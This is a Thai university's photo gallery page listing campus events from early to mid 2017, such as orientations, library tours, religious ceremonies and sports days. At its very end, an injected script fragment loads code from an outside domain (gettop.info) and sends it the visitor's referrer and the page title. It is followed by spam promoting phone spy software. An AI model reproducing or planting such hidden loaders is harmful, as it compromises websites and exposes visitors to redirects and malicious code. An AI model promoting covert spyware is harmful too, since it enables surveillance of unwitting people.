ภาพกิจกรรม

 

 IMG_1930

วันที่ 27 กรกฎาคม 2560
Library on tour
คณะมนุษยศาสตร์และสังคมศาสตร์ 

 

 

 IMG_2144

วันที่ 27 กรกฎาคม 2560
Library on tour
คณะวิทยาศาสตร์และเทคโนโลยี

 

 

 

 DL9A9080
วันที่ 27 กรกฎาคม 2560
งานเฉลิมพระเกียรติพระเจ้าอยู่หัวมหาวชิราลงกรณ
บดินทรเทพยวรางกูร
เนื่องในโอกาสวันเฉลิมพระชนมพรรษา
๖๕ พรรษา
๒๘ กรกฎาคม ๒๕๖๐
DL9A9189

วันที่ 27 กรกฎาคม 2560
ARU Freshy Rally ประจำปีการศึกษา 2560
คณะมนุษยศาสตร์และสังคมศาสตร์ 
คณะวิทยาการจัดการ
IMG_1439

วันที่ 26 กรกฎาคม 2560
Library on tour
 คณะครุศาสตร์

 

 

IMG_1654
วันที่ 26 กรกฎาคม 2560
Library on tour
คณะวิทยาการจัดการ 

 

 

DL9A8458

วันที่ 24 กรกฎาคม 2560
ปฐมนิเทศนักศึกษาใหม่คณะมนุษยศาสตร์และสังคมศาสตร์
และคณะวิทยาศาสตร์และเทคโนโลยี

 

 DL9A8597
วันที่ 25 กรกฎาคม 2560
ปฐมนิเทศนักศึกษาใหม่คณะครุศาสตร์
และคณะวิทยาการจัดการ

 

DL9A8747 
วันที่ 26 กรกฎาคม 2560
ARU Freshy Rally ประจำปีการศึกษา 2560 
คณะวิทยาศาสตร์และเทคโนโลยี
คณะครุศาสตร์ 
DL9A8021
วันที่ 1 กรกฎาคม 2560
112 ปี มหาวิทยาลัยราชภัฏพระนครศรีอยุธยา

 

DL9A8150
วันที่ 5 กรกฎาคม 2560
พิธีแห่เทียนพรรษาและถวายเทียนพรรษา

 

DL9A8299
วันที่ 19 กรกฎาคม 2560
สภากาแฟ งานพบปะหารือระหว่างส่วนราชการ
ทุกภาคส่วนในจังหวัดพระนครศรีอยุธยา 

030760

วันที่ 30 มิถุนายน 2560
พิธีหล่อเทียนพรรษา
010760
วันที่ 1 กรกฎาคม 2560
112 ปี มหาวิทยาลัยราชภัฏพระนครศรีอยุธยา
050760

วันที่ 5 กรกฎาคม 2560
พิธีแห่เทียนพรรษา
DL9A7127

วันที่ 22 มิถุนายน 2560
“เรื่องเล่าขานจากงานพระเมรุ”

 

  260660

วันที่ 26 มิถุนายน 2560
อบรมการบริหารหลักสูตรเพื่อการเผยแพร่ (TQR)

 

280660
วันที่ 28 มิถุนายน 2560
การเรียนการสอนเชิงบูรณาการกับการทำงาน
(Work-integrated Learning: WIL)
DL9A6945
วันที่ 8 มิถุนายน 2560
การสาธิตสักว่กลอนสด เรื่องพระอภัยมณี
ตอน พระอภัยมณีหนีผีเสื้อสมุทร
DL9A7052

วันที่ 15 มิถุนายน 2560
ร่วมต้อนรับองคมนตรี ณ โรงเรียนตำหนักเพนียด

 

DL9A7008
วันที่ 15 มิถุนายน 2560
พิธีไหว้ครูโรงเรียนสาธิตมัธยม

 

aviane

2017-05_134f387ac1e13b7

วันที่ 23 พฤษภาคม 2560
ต้อนรับสภาการศึกษาเทียนจิน สาธารณรัฐประชาชนจีน
DL9A6301

วันที่ 31 พฤษภาคม 2560
พิธีเปิด-ปิด กีฬาเชื่อมความสัมพันธ์บุคลากรมหาวิทยาลัยราชภัฏพระนครศรีอยุธยา
 DL9A6757

วันที่ 2 มิถุนายน 2560
แข่งขันกีฬามหาวิทยาลัยราชภัฏเขตภูมิศาสตร์ ภาคกลาง ครั้งที่ 27 “ราชนครินทร์เกมส์”
 DL9A5360

วันที่ 26 เมษายน 2560
โครงการสานใจไทยสู่ใจใต้ รุ่นที่ 30
 2017-05_530031bfd49faa1

วันที่ 20 พฤษภาคม 2560
พิธีเยี่ยมสถานฝังศพ วางพวงมาลาอุทิศส่วนกุศลแด่เจ้าพระยาบวรราชนายก (เฉกอะหมัด) ครั้งที่ 41
IMG_1208

 วันที่ 23 พฤษภาคม 2560
เชิดชูเกียรติผู้นำนักศึกษา มหาวิทยาลัยราชภัฏพระนครศรีอยุธยา ประจำปีการศึกษา 2559

DL9A2430

วันที่ 6 มีนาคม 2556
ประกาศเจตจำนงตามนโยบายคุณธรรมความโปร่งใส
ในการดำเนินงานของมหาวิทยาลัยราชภัฏพระนครศรีอยุธยา
DL9A4904
วันที่ 4 เมษายน 2560 
งาน ประชุมเชิงปฏิบัติการ“เครือข่ายห้องสมุดมนุษย์แห่งประเทศไทย (Thailand Human Library Network)” ครั้งที่ ๗

 

 

DL9A5063

วันที่ 12 เมษายน 2560
กิจกรรมวันสงกรานต์สโมสรบุคลากรเจ้าหน้าที่

 

 

DL9A1939
วันที่ 14 กุมภาพันธ์ 2560
พิธีบรรพชาอุปสมบทหมู่
DL9A2100

วันที่ 19 กุมภาพันธ์ 2560
พระภิกษุนวกะราชภัฏ 999 รูป จาก 38 มหาวิทยาลัยราชภัฏทั่วประเทศ
 

DL9A2284

 วันที่ 21 กุมภาพันธ์ 2560

พิธีถวายภัตตาหารเพลแด่พระสงฆ์ที่เข้าร่วมโครงการบรรพชาอุปสมบทหมู่ ๙๙๙ รูป

 

DL9A0913
วันที่ 3 กุมภาพันธ์ 2560
งานมนุษยศาสตร์และสังคมศาสตร์วิชาการ

 

 

DL9A1284
วันที่ 9 กุมภาพันธ์ 2560
ค่ายเกาหลีสัมพันธ์

 

DL9A1186
 วันที่ 9 กุมภาพันธ์ 2560
อบรมเชิงปฏิบัติการ “วิจัยประวัติศาสตร์ท้องถิ่น”
DL9A0297
วันที่ 23 มกราคม 2560
แถลงข่าว การแข่งขันกีฬามหาวิทยาลัยราชภัฏ
เขตภูมิศาสตร์ภาคกลาง ครั้งที่ 28
 DL9A0429

วันที่ 25 มกราคม 2560
พิธีทำบุญวัดบรมพุทธาราม

 

 

DL9A1164
วันที่ 3 กุมภาพันธ์ 2560
การแสดงชุด “คีตนาฏกรรม เทิดไท้องค์ราชันย์” 

 

DL9A9889
วันที่ 16 มกราคม 2560
พิธีทำบุญตักบาตร อาหารแห้ง วัคครู
DL9A0005
วันที่ 16 มกราคม 
วันครุวิชาการ ครั้งที่ 5 “ตามรอยพ่อ สืบสานปณิธานงานครู”
 

DL9A0098
วันที่ 20 มกราคม 2560
พิธีบำเพ็ญกุศลสตมวาร (100 วัน)
DL9A9552
วันที่ 6 มหราคม 2560
พิธีทำบุญ ตักบาตรข้าวสารอาหารแห้ง
เนื่องในโอกาสวันขึ้นปีใหม่ ๒๕๖๐

 

DL9A9726

วันที่ 6 มหราคม 2560
พิธีทำบุญ ฝ่ายยานพาหนะ
เนื่องในโอกาสวันขึ้นปีใหม่ 2560

 

 

DL9A9837
 วันที่ 12 มกราคม 2560
สถาบันอยุธนาศึกษา
จัดพิธีถวายภัตราหารเพลแด่พระสงฆ์
เนื่องในโอกาสวันขึ้นปีใหม่ ๒๕๖๐
DL9A9436

วันที่ 4 มกราคม 2560
ประชุมบุคลากรมหาวิทยาลัยสายสนับสนุนวิชาการ ประจำภาคเรียนที่ 2/2559
DL9A9469
วันที่ 4 มกราคม 2560
ประชุมบุคลากรสายวิชาการ ประจำภาคเรียนที่ 2/2559
DL9A9376

วันที่ 4 มกราคม 2560
กราบนมัสการถวายของที่ระลึก เนื่องในเทศกาลปีใหม่ แด่พระเทพมงคลโสภณ เจ้าอาวาสวัดเสนาสนารามราชวรวิหาร

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.